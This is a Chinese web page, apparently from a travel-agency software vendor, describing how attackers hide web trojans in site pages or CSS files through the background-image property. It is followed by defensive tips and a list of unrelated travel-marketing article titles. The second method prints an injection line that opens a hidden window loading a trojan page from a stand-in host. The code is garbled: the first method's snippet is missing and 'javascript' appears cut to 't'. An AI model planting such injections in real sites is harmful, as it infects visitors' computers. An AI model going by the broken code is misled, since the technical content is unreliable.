當前位置:工程項目OA系統(tǒng) > 領域應用 > 服務OA管理系統(tǒng) > 旅行社管理系統(tǒng)
旅游網站管理系統(tǒng)攻防CSS掛馬實錄
方式1:
Body
“background-image”在CSS中的主要功能是用來定義頁面的背景圖片。這是最典型的CSS掛馬方式,這段惡意代碼主要是通過“background-image”配合t代碼讓網頁木馬悄悄地在用戶的電腦中運行。
那如何將這段CSS惡意代碼掛到正常的網頁中去呢?黑客可以將生成好的網頁木馬放到自己指定的位置,然后將該段惡意代碼寫入掛馬網站的網頁中,或者掛馬網頁所調用的CSS文件中。
小百科:
使用Body對象元素,主要是為了讓對象不再改變整個網頁文檔的內容,通過Body對象的控制,可以將內容或者效果控制在指定的大小內,如同使用DIV對象那樣精確地設置大小。
方式2:
Body
background-image: url(t:open("http://www.X.com/muma.htm","newwindow","border="1" Height=0, Width=0, top=1000, center=0, toolbar=no,menubar=no, scrollbars=no,resizable=no,location=no,status=no"))
方式1的CSS掛馬技術,在運行時會出現空白的頁面,影響網頁訪問者正常的訪問,因此比較容易發(fā)現。不過在方式2中的這段代碼,使用了t的Open開窗,通過新開一個隱藏的窗口,在后臺悄悄地運行新窗口并激活訪問網頁溢出木馬頁面,不會影響訪問者觀看網頁內容,因此更加隱蔽。
防網絡服務器被掛馬,通常會出現防病毒軟件告警之類的信息。由于漏洞不斷更新,掛馬種類時刻都在變換,通過客戶端的反映來發(fā)現服務器是否被掛馬往往疏漏較大。正確的做法是經常檢查服務器日志,發(fā)現異常信息,經常檢查網站代碼,使用網頁木馬檢測系統(tǒng),進行排查。
- 1旅游網站建設規(guī)劃書包含哪些內容
- 2河北西柏坡重建紅色旅游區(qū)指日可待
- 3淺析意境流視角下的邊緣型古鎮(zhèn)旅游營銷戰(zhàn)略研究——以芙蓉古鎮(zhèn)為例
- 4什么旅行社管理軟件最好?
- 5網絡旅游營銷新模式之旅游視頻營銷
- 6數字虛擬景區(qū)—旅游網絡營銷的創(chuàng)新工具
- 7世博下一站——秀水千島湖
- 8旅游網站建設SEO思維結構
- 9旅游營銷經濟拉動文化發(fā)展
- 10“海峽旅游銀行卡”——旅游網站建設新嘗試
- 11網站集群的設置。
- 12旅游網站管理系統(tǒng),離島免稅不會影響香港旅游購物
- 13旅行社管理系統(tǒng)的深入分析
- 14旅游網站建設政治環(huán)境及其影響
- 15旅游網站建設的策略
- 16旅游網站管理系統(tǒng),中國旅游日對中國旅游節(jié)的影響
- 17旅游網站模板怎么配色
- 18旅游網站建設的分類
- 19旅游網站制作與IT
- 20旅游網站建設需要選擇營銷策略設計
- 21關于論壇的策劃。
- 22冬季旅游營銷,從觀念做好
- 23發(fā)展我國旅游業(yè)電子商務的對策
- 24戰(zhàn)略專家 讓任何文化都與人有關系
- 25旅游網站制作新方法憑借資源優(yōu)勢分享旅游業(yè)高增長
- 26對旅游景區(qū)品牌營銷的思考
- 27進軍電子商旅市場 張家界旅游營銷電子模式
- 28旅游網站如何做好旅游營銷打響知名度
- 29旅游網站管理系統(tǒng)2011年廣州國際旅游展覽會揭幕
- 30旅游營銷有利于提升景區(qū)品牌形象
成都公司:成都市成華區(qū)建設南路160號1層9號
重慶公司:重慶市江北區(qū)紅旗河溝華創(chuàng)商務大廈18樓